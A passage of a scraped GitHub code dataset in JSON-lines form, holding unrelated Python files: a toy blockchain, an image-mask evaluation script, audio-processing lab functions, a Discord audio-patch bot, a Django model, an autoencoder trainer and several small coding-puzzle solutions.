self.data = data\n        self.previous_hash = previous_hash\n        self.nonce = nonce\n        self.hash = self.calculate_hash()\n\n    def __str__(self):\n        transaction_details = \"\\n\".join(str(transaction) for transaction in self.transactions)\n        return f\"Index: {self.index}\\nTimestamp: {self.timestamp}\\nTransactions:\\n{transaction_details}\\nHash: {self.hash}\\nPrevious Hash: {self.previous_hash}\"\n\n    def calculate_hash(self):\n        sha = hashlib.sha256()\n        sha.update((str(self.index) + str(self.timestamp) + str(self.transactions) + str(self.previous_hash) + str(self.nonce)).encode('utf-8'))\n        return sha.hexdigest()\n\n    def mine_block(self, difficulty):\n        target = '0' * difficulty\n        while self.hash[:difficulty] != target:\n            self.nonce += 1\n            self.hash = self.calculate_hash()\n\nclass Blockchain:\n    def __init__(self):\n        self.chain = [self.create_genesis_block()]\n        self.difficulty = 4\n        self.pending_transactions = []\n\n    def create_genesis_block(self):\n        return Block(0, time.time(), [], \"Genesis Block\", \"0\", nonce=0)\n\n    def get_latest_block(self):\n        return self.chain[-1]\n\n    def add_transaction(self, transaction):\n        self.pending_transactions.append(transaction)\n\n    def mine_pending_transactions(self, miner_address):\n        previous_hash = self.get_latest_block().hash\n        block = Block(len(self.chain), time.time(), self.pending_transactions, \"Block data\", previous_hash, nonce=0)\n        block.mine_block(self.difficulty)\n        self.chain.append(block)\n        self.pending_transactions = []\n\n    def add_block(self, new_block):\n        new_block.previous_hash = self.get_latest_block().hash\n        new_block.mine_block(self.difficulty)\n        new_block.hash = new_block.calculate_hash()\n        self.chain.append(new_block)\n\n    def is_chain_valid(self):\n        for i in range(1, len(self.chain)):\n            current_block = self.chain[i]\n            previous_block = self.chain[i - 1]\n            if current_block.hash != current_block.calculate_hash():\n                return False\n            if current_block.previous_hash != previous_block.hash:\n                return False\n        return True\n\n\nblockchain = Blockchain()\n\n# Start synchronization with another node on the network\nblockchain.chain = synchronize_chain(outro_host, outro_port)\n\n# Start listening for requests from other nodes\nlisten_for_requests(port, blockchain)\n\ntransaction1 = Transaction(\"Bismuto\", \"Mafalda\", 7)\ntransaction2 = Transaction(\"Saci\", \"Oracio\", 3)\ntransaction3 = Transaction(\"Florentina\", \"Dolores\", 0.5)\n\n# Sign the transactions with the private key\nsign_transaction(transaction1, private_key)\nsign_transaction(transaction2, private_key)\nsign_transaction(transaction3, private_key)\n\n# Verify the transaction signatures with the public key\nprint(\"Verifying transaction signatures...\")\nprint(\"Transaction 1 signature:\", verify_signature(transaction1, public_key))\nprint(\"Transaction 2 signature:\", verify_signature(transaction2, public_key))\nprint(\"Transaction 3 signature:\", verify_signature(transaction3, public_key))\n\n# Add the pending transactions\nblockchain.add_transaction(transaction1)\nblockchain.add_transaction(transaction2)\nblockchain.add_transaction(transaction3)\n\n# Mine the pending transactions\nprint(\"\\nMining blocks...\")\nblockchain.mine_pending_transactions(\"Miner\")\n\n# Validate the chain\nprint(\"Chain validity:\", blockchain.is_chain_valid())\n\nfor block in blockchain.chain:\n    print(f\"\\nIndex: {block.index}\")\n    print(f\"Timestamp: {block.timestamp}\")\n    print(\"Transactions:\")\n    for transaction in block.transactions:\n        print(transaction)\n    print(f\"Hash: {block.hash}\")\n    
print(f\"Previous Hash: {block.previous_hash}\")","repo_name":"Mbrizzo/blockc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74215245656","text":"from utils import *\nimport numpy as np\nfrom tqdm import tqdm, trange\nfrom run_on_image import inference_on_image_stack\nimport glob\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\n\n# Given greyscale images, masks in .npz format, get the Jaccard similarity and BCE loss from a given model\ndef main():\n debug_n = 0\n data_dir = \"/home/prakashlab/Documents/kmarx/train_m2unet_cellpose_cloud/data_uganda_hemaprep_mid_third_subset\"\n model_path = \"/home/prakashlab/Documents/kmarx/train_m2unet_cellpose_cloud/m2unet_model_flat_less_erode_2_rotfirst\"\n model_name = \"model_24_9.pth\"\n save_dir = \"results_flat_erode_rotfirst_with_eroded_masks_final\"\n save_file = \"uganda_mid_third\"\n save_best = True # save the image with the lowest loss\n save_worst = True # save the image with the highest loss\n n_batch = 50\n erode_mask = 1 # set negative to ignore\n\n os.makedirs(save_dir, exist_ok=True)\n\n # Get image paths\n images = glob.glob(os.path.join(data_dir, \"**.npz\"), recursive=True)\n n_images = len(images)\n print(f\"{n_images} images to process\")\n w, h = np.load(images[0])[\"img\"].shape\n # preallocate memory for the images, masks, and predictions\n image_stack = np.zeros((n_batch, w, h), dtype=float)\n mask_stack = np.zeros((n_batch, w, h), dtype=bool)\n inference_stack = np.zeros((n_batch, w, h), dtype=bool)\n # store results: paths,jaccard,bce\n data_list = []\n # loop in batches\n index = 0\n if save_best:\n best_loss = np.inf\n best_pred = np.zeros((w, h), dtype=np.uint8)\n if save_worst:\n worst_loss = 0\n worst_pred = np.zeros((w, h), dtype=np.uint8)\n pbar = tqdm(total=n_images)\n while index < n_images:\n end_idx = min(index + n_batch, n_images)\n # load batch of images\n for i in range(index,end_idx):\n data = np.load(images[i])\n # Load the image\n image_stack[(i-index), :, :] = data[\"img\"]\n # Load the mask\n if erode_mask >= 0:\n shape = cv2.MORPH_ELLIPSE\n element = cv2.getStructuringElement(shape, (2 * erode_mask + 1, 2 * erode_mask + 1), (erode_mask, erode_mask))\n mask_stack[(i-index), :, :] = np.array(cv2.erode(data[\"mask\"], element))\n else:\n mask_stack[(i-index), :, :] = data[\"mask\"]\n inference_stack, __, times = inference_on_image_stack(image_stack, model_path, model_name)\n # compare results\n for i in range(index,end_idx):\n jaccard = jaccard_similarity_bin_mask(mask_stack[(i-index), :, :], inference_stack[(i-index), :, :])\n bce = binary_cross_entropy(mask_stack[(i-index), :, :], inference_stack[(i-index), :, :])\n path = images[i]\n data_list.append([path, jaccard, bce, times[i-index]])\n if save_best:\n if bce < best_loss:\n best_loss = bce\n best_pred = 225*inference_stack[(i-index), :, :]\n if save_worst:\n if bce > worst_loss:\n worst_loss = bce\n worst_pred = 225*inference_stack[(i-index), :, :]\n if jaccard < 0.7:\n cv2.imwrite(os.path.join(save_dir, f\"{i}_{save_file}_worst_pred.png\"), worst_pred)\n cv2.imwrite(os.path.join(save_dir, f\"{i}_{save_file}_worst_im.png\"), image_stack[(i-index), :, :])\n pbar.update(end_idx - index)\n index = end_idx\n if debug_n > 0 and index > debug_n:\n break\n pbar.close()\n results_df = pd.DataFrame(columns=['path', 'jaccard', 'bce', 'time'], data=data_list)\n 
results_df.to_csv(os.path.join(save_dir, f\"{save_file}_{n_images}.csv\"))\n    if save_best:\n        cv2.imwrite(os.path.join(save_dir, f\"{save_file}_best.png\"), best_pred)\n    if save_worst:\n        cv2.imwrite(os.path.join(save_dir, f\"{save_file}_worst.png\"), worst_pred)\n\n\ndef jaccard_similarity_bin_mask(A, B):\n    # Calculate Jaccard similarity of two masks\n    intersection = np.sum(np.logical_and(A, B))\n    union = np.sum(np.logical_or(A, B))\n    res = intersection/union\n    return res\n\ndef binary_cross_entropy(y_true, y_pred):\n    # Convert to tensors\n    y_true = torch.tensor(y_true).float()\n    y_pred = torch.tensor(y_pred).float()\n\n    # Calculate binary cross-entropy\n    bce_loss = F.binary_cross_entropy(y_pred, y_true)\n\n    return bce_loss.item()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"kmarx-kmarx-kmarx/m2unet_image_harness","sub_path":"test_bulk_data.py","file_name":"test_bulk_data.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"17799535337","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 12 18:44:58 2016\n@author: robintiman\n\"\"\"\nfrom scipy import *\nfrom pylab import *\n\n\nclass P1:\n\n    def __init__(self):\n        knot = [0, 1, 2, 3, 4, 5, 6]\n        self.basis_func(knot, 3, 4, 3.4)\n        print(\"hekk\")\n\n    # knot vector U = { u0, u1, ..., um }\n    def basis_func(self, knot, k, i, u):\n        # Base case\n        if k == 0:\n            if knot[i-1] == knot[i]:\n                return 0\n            elif knot[i-1] <= u < knot[i]:\n                return 1\n            else:\n                return 0\n\n        # Perform the divisions, treating 0/0 as 0 (the standard B-spline convention)\n        denom_a = knot[i+k-1] - knot[i-1]\n        denom_b = knot[i+k] - knot[i]\n        a = (u - knot[i-1]) / denom_a if denom_a != 0 else 0\n        b = (knot[i+k] - u) / denom_b if denom_b != 0 else 0\n\n        return a * self.basis_func(knot, k-1, i, u) + b * self.basis_func(knot, k-1, i+1, u)\n\n\n","repo_name":"robintiman-zz/FMNN25","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"31740142984","text":"\"\"\"\n6.1010 Spring '23 Lab 0: Audio Processing\n\"\"\"\n\nimport wave\nimport struct\n\n# No additional imports allowed!\n\n\ndef backwards(sound):\n    \"\"\"\n    Compute a new mono sound which is the reversed version of the original mono sound\n    Args:\n        sound: A mono sound dictionary with two key/value pairs:\n            * \"rate\": an int representing the sampling rate, samples per second\n            * \"samples\": a list of floats containing the sampled values\n\n    Returns:\n        A new mono sound dictionary.\n    \"\"\"\n    new_samples = sound[\"samples\"][::-1] # list of samples in reverse\n    new_sound = {} # new dict\n    new_sound[\"rate\"] = sound[\"rate\"]\n    new_sound[\"samples\"] = new_samples\n    return new_sound\n\n\ndef mix(sound1, sound2, p):\n    \"\"\"\n    Mixes 2 sounds\n    Args:\n        sound1: dict with same 'rate' as sound2\n        sound2: dict with same 'rate' as sound1\n        p: mixing parameter\n    Returns:\n        A new sound which is p*'samples' in sound1 + (1-p)*'samples' in sound2.\n        Return None if diff rate\n    \"\"\"\n    # mix 2 good sounds\n    if not (\n        \"rate\" in sound1.keys()\n        and \"rate\" in sound2.keys()\n        and sound1[\"rate\"] == sound2[\"rate\"]\n    ):\n        return\n\n    r = sound1[\"rate\"] # get rate\n    if len(sound1) == 2 and len(sound2) == 2:\n        sound1 = sound1[\"samples\"]\n        sound2 = sound2[\"samples\"]\n        sound_len=min(len(sound1),len(sound2))\n        \n        mix_sample_mono = mixsample(sound1,sound2,p)\n        \n        return {\"rate\": r, \"samples\": mix_sample_mono} # 
return new sound\n\n if len(sound1) == 3 and len(sound2) == 3:\n sound1_lft = sound1[\"left\"]\n sound2_lft = sound2[\"left\"]\n mix_sample_lft = mixsample(sound1_lft,sound2_lft,p)\n\n sound1_rt = sound1[\"right\"]\n sound2_rt = sound2[\"right\"]\n mix_sample_rt = mixsample(sound1_rt,sound2_rt,p)\n \n return {\"rate\": r, \"left\": mix_sample_lft, \"right\": mix_sample_rt}\n\ndef mixsample(sound1,sound2,p):\n \"\"\"\n Computes mixing of sample for mix fn\n Args:\n sound1: dict\n sound2: dict\n Return:\n mix_sample: list\n \"\"\"\n sound_len=min(len(sound1),len(sound2))\n mix_sample = []\n x = 0\n while x <= sound_len:\n s2, s1 = p * sound1[x], sound2[x] * (1 - p)\n mix_sample.append(s1 + s2) # add sounds\n x += 1\n if x == sound_len: # end\n break\n return mix_sample\n\ndef convolve(sound, kernel):\n \"\"\"\n Applies a filter to a sound, resulting in a new sound that is longer than\n the original mono sound by the length of the kernel - 1.\n Does not modify inputs.\n\n Args:\n sound: A mono sound dictionary with two key/value pairs:\n * \"rate\": an int representing the sampling rate, samples per second\n * \"samples\": a list of floats containing the sampled values\n kernel: A list of numbers\n\n Returns:\n A new mono sound dictionary.\n \"\"\"\n samples = [0] # a list of scaled sample lists\n\n result_len = len(sound[\"samples\"]) + len(kernel) - 1\n samples *= result_len # list of 0's\n\n for shift, scale in enumerate(kernel): # gives index and num\n if scale != 0:\n for i, num in enumerate(sound[\"samples\"]):\n scale_sample = num * scale\n samples[i + shift] += scale_sample # add as you go, no list in btwn\n\n convolve_sound = {} # new dict\n convolve_sound[\"rate\"] = sound[\"rate\"]\n convolve_sound[\"samples\"] = samples\n\n return convolve_sound\n\n \n\ndef echo(sound, num_echoes, delay, scale):\n \"\"\"\n Compute a new signal consisting of several scaled-down and delayed versions\n of the input sound. 
Does not modify input sound.\n\n Args:\n sound: a dictionary representing the original mono sound\n num_echoes: int, the number of additional copies of the sound to add\n delay: float, the amount of seconds each echo should be delayed\n scale: float, the amount by which each echo's samples should be scaled\n\n Returns:\n A new mono sound dictionary resulting from applying the echo effect.\n \"\"\"\n # echo_filter = [0] * (sample_delay * num_echoes) #list of 0's of new len\n sample_delay = round(delay * sound[\"rate\"]) # num of samples\n\n # make kernel\n zero_lst = [0] * (sample_delay - 1)\n scale_lst = []\n\n for i in range(num_echoes + 1):\n scale_lst.extend([scale**i]) # match scale to indx\n if i != num_echoes: # no 0's at end\n scale_lst.extend(zero_lst)\n\n return convolve(sound, scale_lst)\n\n \n\ndef pan(sound):\n \"\"\"\n Create a really neat spatial effect\n Args:\n sound: dict with keys 'rate','lft','rght'\n Returns:\n new list with scaled values\n \"\"\"\n\n sound_lft = sound[\"left\"][:]\n sound_rt = sound[\"right\"][:]\n len_dp_sound = len(sound_lft) # same len\n # print(len_dp_sound)\n adj_samples = {}\n adj_samples[\"rate\"] = sound[\"rate\"]\n adj_lft = []\n adj_rt = []\n\n for i in range(len_dp_sound):\n if i == 0: # index = 0\n adj_lft.append(sound_lft[0])\n adj_rt.append(0)\n elif i == len_dp_sound - 1: # last indx\n adj_rt.append(sound_rt[len_dp_sound - 1])\n adj_lft.append(0)\n else: # scale\n adj_rt.append(sound_rt[i] * (i / (len_dp_sound - 1))) # added ()\n adj_lft.append(sound_lft[i] * ((1 - (i / (len_dp_sound - 1)))))\n\n adj_samples[\"left\"] = adj_lft\n adj_samples[\"right\"] = adj_rt\n\n return adj_samples\n\n\ndef remove_vocals(sound):\n \"\"\"\n Remove vocals from sound\n Args:\n sound: stero\n Returns:\n new sound: mono\n \"\"\"\n sound_lft = sound[\"left\"][:] # list copy\n sound_rt = sound[\"right\"][:]\n rem_sound = {} # new dict\n rem_sound[\"rate\"] = sound[\"rate\"]\n rem_lst = []\n\n for i,j in enumerate(sound_lft): # calc diff\n rem_lst.extend([j - sound_rt[i]]) # must be list to extend\n\n rem_sound[\"samples\"] = rem_lst\n\n return rem_sound\n\n\n# below are helper functions for converting back-and-forth between WAV files\n# and our internal dictionary representation for sounds\n\n\ndef bass_boost_kernel(boost, scale=0):\n \"\"\"\n Constructs a kernel that acts as a bass-boost filter.\n\n We start by making a low-pass filter, whose frequency response is given by\n (1/2 + 1/2cos(Omega)) ^ N\n\n Then we scale that piece up and add a copy of the original signal back in.\n\n Args:\n boost: an int that controls the frequencies that are boosted (0 will\n boost all frequencies roughly equally, and larger values allow more\n focus on the lowest frequencies in the input sound).\n scale: a float, default value of 0 means no boosting at all, and larger\n values boost the low-frequency content more);\n\n Returns:\n A list of floats representing a bass boost kernel.\n \"\"\"\n # make this a fake \"sound\" so that we can use the convolve function\n base = {\"rate\": 0, \"samples\": [0.25, 0.5, 0.25]}\n kernel = {\"rate\": 0, \"samples\": [0.25, 0.5, 0.25]}\n for i in range(boost):\n kernel = convolve(kernel, base[\"samples\"])\n kernel = kernel[\"samples\"]\n\n # at this point, the kernel will be acting as a low-pass filter, so we\n # scale up the values by the given scale, and add in a value in the middle\n # to get a (delayed) copy of the original\n kernel = [i * scale for i in kernel]\n kernel[len(kernel) // 2] += 1\n\n return kernel\n\n\ndef 
load_wav(filename, stereo=False):\n \"\"\"\n Load a file and return a sound dictionary.\n\n Args:\n filename: string ending in '.wav' representing the sound file\n stereo: bool, by default sound is loaded as mono, if True sound will\n have left and right stereo channels.\n\n Returns:\n A dictionary representing that sound.\n \"\"\"\n sound_file = wave.open(filename, \"r\")\n chan, bd, sr, count, _, _ = sound_file.getparams()\n\n assert bd == 2, \"only 16-bit WAV files are supported\"\n\n out = {\"rate\": sr}\n\n left = []\n right = []\n for i in range(count):\n frame = sound_file.readframes(1)\n if chan == 2:\n left.append(struct.unpack(\" int:\n res = 0\n for i in range(1, len(timeSeries)):\n res += min(duration, timeSeries[i] - timeSeries[i-1])\n if len(timeSeries) > 0:\n res += duration\n return res\n\nprint(Solution().findPoisonedDuration([1,2,3,4,5,6,7,8,9], 1))","repo_name":"ZhikunWei/daily_oj","sub_path":"20211110-495.py","file_name":"20211110-495.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18505762630","text":"# Write a program that takes a list of numbers (for example, a = [5, 10, 15, 20, 25]) and makes a new list of only the first and last elements of the given list. For practice, write this code inside a function.\n\n\n\ndef list_end():\n a = [5,10,15,20,25]\n new_list = []\n new_list.append(a[0])\n new_list.append(a[-1])\n return new_list\n \n\nif __name__ == \"__main__\":\n b = list_end()\n print(b)\n\n\n","repo_name":"Netra-Bahadur-khatri/Python_dajngo_By_Ranbindra_Joshi","sub_path":"12_ListsEnd.py","file_name":"12_ListsEnd.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2773650075","text":"import sys\nimport math\nimport pylab\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys,argparse\n\n\ncl = ['red','blue','green']\nll =['10%','30%','50%']\ntrt = []\nacfrt = []\ntft = []\nacfft = []\nfor i in [1,3,5]:\n\tf = open(str(i)+\".out\",'r')\n\tg = open(\"fit.kww.\"+str(i)+\".out\",'r')\n\tlinesf = f.readlines()\n\tlinesg = g.readlines()\n\tf.close()\n\tg.close()\n\tlinesf = linesf[1:]\n\tlinesf = np.asarray([line.split() for line in linesf])\n\ttr = np.asarray(map(lambda x: float(x), linesf[:,0]))\n\tacfr = np.asarray(map(lambda x: float(x), linesf[:,1]))\n\ttrt.append(tr)\n\tacfrt.append(acfr)\n\t\n\tlinesg = linesg[1:]\n\tlinesg = np.asarray([line.split() for line in linesg])\n\ttf = np.asarray(map(lambda x: float(x), linesg[:,0]))\n\tacff = np.asarray(map(lambda x: float(x), linesg[:,1]))\n\ttft.append(tf)\n\tacfft.append(acff)\nfs = 20\t\nfor i in range(3):\n\tplt.plot(trt[i][:(len(trt)-40)],acfrt[i][:(len(trt)-40)],color=cl[i],label = ll[i],alpha=1,linewidth=2)\n\tplt.plot(tft[i],acfft[i],color=cl[i],linestyle='--',linewidth=2)\nplt.yticks(fontsize=fs)\nplt.xticks(fontsize=fs)\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.ylim([0.3,1.2])\nplt.yticks([0.5,1],[0.5,1])\nplt.xlabel(\"time/ns\",fontsize=fs)\nplt.ylabel(\"ACF\",fontsize=fs)\nplt.tight_layout()\nplt.legend(loc='lower left',fontsize=fs)\nplt.show()\n","repo_name":"weiweichu/analysis-tool","sub_path":"compsingleplot.py","file_name":"compsingleplot.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73130831577","text":"import uuid\nfrom django.utils import timezone\nfrom django.db 
import models\nfrom datetime import date\nfrom ..utils import get_thumbnail\n\nclass Movie(models.Model):\n    CATEGORY = (\n        (0, '其他'),\n        (1, '爱情'),\n        (2, '恐怖'),\n        (3, '悬疑'),\n        (4, '冒险'),\n        (5, '喜剧'),\n        (6, '动作'),\n        (7, '科幻'),\n        (8, '综艺'),\n        (9, '动漫'),\n        (10, '卡通'),\n        (11, 'LGBT')\n    )\n    AREA = (\n        (0, '中国'),\n        (1, '美国'),\n        (2, '英国'),\n        (3, '韩国'),\n        (4, '日本'),\n        (5, '泰国'),\n        (6, '马来西亚'),\n    )\n    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n    title = models.CharField(max_length=150)\n    description = models.TextField(max_length=5000)\n    img = models.ImageField(upload_to=\"uploads/movies\", blank=True)\n    thumbnail = models.ImageField(upload_to=\"uploads/movies\", blank=True)\n    director = models.CharField(max_length=150)\n    actor = models.CharField(max_length=150)\n    year = models.DateField(default=date(2000, 1, 1))\n    category = models.IntegerField(choices=CATEGORY,null=False, blank=False,default=0)\n    area = models.IntegerField(choices=AREA,null=False, blank=False,default=0)\n    createdAt = models.DateTimeField(default=timezone.now)\n    updatedAt = models.DateTimeField(default=timezone.now)\n    \n    def save(self, *args, **kwargs):\n        if self.img:\n            # ratio 3:4 0.75\n            self.img = get_thumbnail(self.img, 100, False, 0.75) # quality = 100, isThumbnail False = maxWidthHeight = 1024px\n            self.thumbnail = get_thumbnail(self.img, 100, True, 0.75) # quality = 100, isThumbnail True = maxWidthHeight = 256px\n        super(Movie, self).save(*args, **kwargs)","repo_name":"CheangFouSUY/api-yueying","sub_path":"api/models/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} 
+{"seq_id":"1685638773","text":"\"\"\"\r\nUnlike threading, multiprocessing can assist in speeding up CPU-bound tasks. I/O-bound tasks (file system and networking work, e.g. HTTPS requests and file input/output)\r\ncan also be sped up using multiprocessing.\r\n\"\"\"\r\nimport time\r\nimport multiprocessing\r\nimport concurrent.futures\r\n\r\n# calc start time\r\nstart = time.perf_counter()\r\n\r\n\r\ndef do_something(seconds):\r\n    print(f'Sleeping for {round(seconds, 2)} second(s)...')\r\n    time.sleep(seconds)\r\n    print('Done Sleeping...')\r\n\r\nwith concurrent.futures.ProcessPoolExecutor() as executor:\r\n    secs = [5, 4, 3, 2, 1]\r\n    results = [executor.submit(do_something, sec) for sec in secs]\r\n\r\n    for f in concurrent.futures.as_completed(results):\r\n        print(f.result())\r\n\r\n\r\n# pass the actual value of the function not the return value which is denoted by ()\r\n# p1 = multiprocessing.Process(target=do_something)\r\n# p2 = multiprocessing.Process(target=do_something)\r\n\r\n# In order to run the code use .start() to run the initialized variables p1 & p2\r\n# p1.start()\r\n# p2.start()\r\n\r\n# In order to actually run the process before moving down in the script we use the join() method.\r\n# p1.join()\r\n# p2.join()\r\n\r\n# Instead of entering each value manually, loop over a range of processes.\r\n# Underscore is a throwaway variable.\r\n# nterms = int(input('Please input an integer range to loop over:'))\r\n#\r\n# processes = []\r\n#\r\n# for _ in range(nterms):\r\n#     p = multiprocessing.Process(target=do_something, args=[1.5])\r\n#     p.start()\r\n#     processes.append(p)\r\n#\r\n# for process in processes:\r\n#     process.join()\r\n\r\n\r\n# To check that you understand synchronous code, call the do_something() func twice\r\n# do_something()\r\n# do_something()\r\n\r\n# calc finish time\r\nfinish = time.perf_counter()\r\n\r\nprint(f'Finished in {round(finish - start, 2)} second(s)')\r\n","repo_name":"tucker517/Python","sub_path":"Py_Projects/Learning_Modules/Multiprocessing/multiprocessing.py","file_name":"multiprocessing.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"15015925641","text":"#!/usr/bin/env python3\n\nimport argparse\nimport asyncio\nimport os\nimport sys\n\nimport discord\nimport numpy as np\nimport sounddevice as sd\n\n\nclass SoundDeviceSource(discord.AudioSource):\n    def __init__(self, device):\n        self.stream = sd.InputStream(samplerate=48000,\n                                     channels=1,\n                                     device=device,\n                                     dtype='int16',\n                                     latency='low')\n        self.stream.start()\n\n    def is_opus(self):\n        return False\n\n    def read(self):\n        (data, _) = self.stream.read(960)\n        data = np.repeat(data, 2, 1)\n        return data.data.tobytes()\n\n    def cleanup(self):\n        self.stream.stop()\n\n\nclass VoxSource(discord.AudioSource):\n    def __init__(self, source):\n        self.source = source\n\n        self.active = False\n        self.threshold = 16\n        self.duration = 25\n        self.silent_for = 0\n\n        if self.source.is_opus():\n            raise ValueError(\"cannot use VoxSource with an Opus source\")\n\n        self.voice = None\n        self.task = None\n\n    def is_opus(self):\n        return self.source.is_opus()\n\n    def read(self):\n        data = self.source.read()\n\n        if self.active:\n            if max(data) < self.threshold:\n                self.silent_for += 1\n                if self.silent_for >= self.duration:\n                    print('VOX off')\n                    self.active = False\n                    return bytes([])\n            else:\n                self.silent_for = 0\n\n        return data\n\n    def cleanup(self):\n        pass\n\n    async def on_vox(self):\n        loop = asyncio.get_running_loop()\n        while True:\n            start_time = loop.time()\n            if not self.active:\n                data = self.read()\n                if max(data) >= self.threshold:\n                    print('VOX on')\n                    self.active = True\n                    self.voice.play(self)\n\n            await asyncio.sleep(loop.time() - 
start_time + 0.002)\n\n def start_vox(self, voice):\n self.voice = voice\n self.task = asyncio.create_task(self.on_vox())\n\n def stop_vox(self):\n self.task.cancel()\n\n\nclass AudioPatchClient(discord.Client):\n def __init__(self, channel, guild=None, input_device=sd.default.device[0]):\n super().__init__()\n\n try:\n input_device = int(input_device)\n except ValueError:\n pass\n real_source = SoundDeviceSource(device=input_device)\n self.source = VoxSource(real_source)\n\n try:\n self.channel_id = int(channel)\n except ValueError:\n self.channel_id = None\n self.channel_name = channel\n self.guild = guild\n\n self.voice = None\n\n async def on_ready(self):\n print(\"Logged on as\", self.user)\n\n if self.channel_id is not None:\n channel = self.get_channel(self.channel_id)\n else:\n channel = None\n for guild in self.guilds:\n if self.guild and guild.name != self.guild:\n continue\n for guild_channel in guild.voice_channels:\n if guild_channel.name == self.channel_name:\n channel = guild_channel\n break\n if not channel:\n print(\"{0}: error: can't find channel '{1}'\"\n .format(sys.argv[0], self.channel_id),\n file=sys.stderr)\n sys.exit(1)\n\n self.voice = await channel.connect()\n print(\"Connected to voice channel\", self.voice.channel.name)\n\n self.source.start_vox(self.voice)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Patch a pair of audio devices to a Discord voice channel\")\n parser.add_argument('channel', metavar='CHANNEL', nargs='?',\n help=\n \"voice channel to patch (channel ID or name)\")\n parser.add_argument('--guild',\n default=None,\n help=\"guild name\")\n parser.add_argument('--token',\n default=os.environ.get('DISCORD_TOKEN', None),\n help=\"Discord token (default: $DISCORD_TOKEN)\")\n parser.add_argument('--input',\n default=sd.default.device[0],\n help=\"input audio device (ID or name)\")\n parser.add_argument('--list-devices', action='store_true',\n help=\"list audio devices\")\n args = parser.parse_args()\n\n if args.list_devices:\n print('Input devices:')\n device_id = 0\n for device in sd.query_devices():\n if device['max_input_channels'] > 0:\n print(' {0}:'.format(device_id), device['name'])\n device_id += 1\n print()\n sys.exit(0)\n\n if not args.token:\n print(\"{0}: error: --token or $DISCORD_TOKEN required\".format(sys.argv[0]),\n file=sys.stderr)\n sys.exit(1)\n\n if args.channel is None:\n print(\"{0}: error: CHANNEL required\".format(sys.argv[0]),\n file=sys.stderr)\n sys.exit(1)\n\n client = AudioPatchClient(channel=args.channel,\n guild=args.guild,\n input_device=args.input)\n client.run(args.token)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"franrogers/discord-audio-patch","sub_path":"audio_patch.py","file_name":"audio_patch.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14805535361","text":"import argparse\n\nimport json\nimport torch\n\nfrom utils.dataloader import load_dataset\nfrom modules.autoencoder import Autoencoder\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\nCONFIG_DIR = \"./configs/\"\n\n\ndef train(args):\n config = json.load(open(CONFIG_DIR + args.config, 'r'))\n data = args.data\n validation = args.validation\n\n lr = config[\"training\"][\"lr\"]\n epochs = config[\"training\"][\"epochs\"]\n batch = config[\"training\"][\"batch_size\"]\n\n if args.epochs:\n epochs = args.epochs\n if args.batch:\n batch = args.batch\n if args.lr:\n lr = args.lr\n\n print(\"### Loading data 
###\")\n train_loader = load_dataset(data, batch, is_train=True)\n if validation:\n valid_loader = load_dataset(data, batch, is_train=not(validation))\n else:\n valid_loader = None\n print(\"### Loaded data ###\")\n\n model = Autoencoder(\n device=DEVICE,\n config=config\n )\n model.to(DEVICE)\n model.fit(train_loader, lr, epochs, validloader=valid_loader)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--data',\n type=str,\n default=\"mnist\",\n help=\"Load dataset specified. mnist(default) or cifar.\")\n parser.add_argument(\"--validation\",\n action=\"store_true\",\n help=\"Specify if you want to use validation set.\")\n parser.add_argument('--config',\n type=str,\n default=\"MNIST/all_TT.json\",\n help=\"Path to config file, all_TT.json as default.\")\n parser.add_argument('--lr',\n type=float,\n default=None)\n parser.add_argument('--epochs',\n type=int,\n default=None)\n parser.add_argument('--batch',\n type=int,\n default=None)\n args = parser.parse_args()\n train(args)\n","repo_name":"jimleroux/TT-DCGAN","sub_path":"train_ae.py","file_name":"train_ae.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11554404054","text":"# https://www.acmicpc.net/problem/2720\n\nT = int(input())\n\ncheck_list = [25, 10, 5, 1]\n\nfor i in range(T):\n C = int(input())\n\n for j in check_list:\n print(C // j, end=\" \")\n\n C = C % j\n\n print()","repo_name":"Gnoyh/baekjoon-python","sub_path":"baekjoon_2720.py","file_name":"baekjoon_2720.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797431206","text":"#!/usr/bin/env python3\n\nfrom collections import deque\n\n\nclass Solution:\n def shortestPathBinaryMatrix(self, grid: list[list[int]]) -> int:\n height = len(grid)\n width = len(grid[0])\n dist = [[-1] * width for i in range(height)]\n to_see = deque([(height - 1, width - 1)]) if grid[height -1][height -1] == 0 else None\n dist[height - 1][width - 1] = 1 if to_see else -1\n 